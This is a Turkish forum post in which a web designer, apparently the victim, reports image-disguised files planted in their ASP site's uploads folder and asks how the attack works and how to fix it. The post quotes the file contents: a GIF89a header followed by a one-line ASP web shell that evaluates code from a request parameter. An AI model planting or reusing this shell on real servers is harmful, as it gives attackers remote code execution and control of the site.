-
Üyelik
30.01.2012
-
Yaş/Cinsiyet
39 / E
-
Meslek
web tasarım
-
Konum
Kahramanmaraş
-
Ad Soyad
A** A**
-
Mesajlar
142
-
Beğeniler
1 / 11
-
Ticaret
0, (%0)
merhaba arkadaşlar. sitemin birisinin ana dizinine uploads klasörü adı altında gif veya jpeg gibi gösterilmiş shell olarak tabir edilen dosyalar sokulmuş. dosyaları txt ile açtığımda fonksiyonu olmayan basit bir kodlama yazılmış.
GIF89a
<%response.write("a1"&"b2"&"c3"&"d4")&eval(request("Fex0"))%>
bu işlemi nasıl yapıyorlar. sitemin admin paneli dışında upload işlemi yapılan bir yer yok. admin kısmındaki upload alanlarınada ulaşmaları çok zor.
bu açığın nedeni nedir ve nasıl kapatabilirim. Bu arada sitem windows sunucu üzerinde asp tabanlı bir site
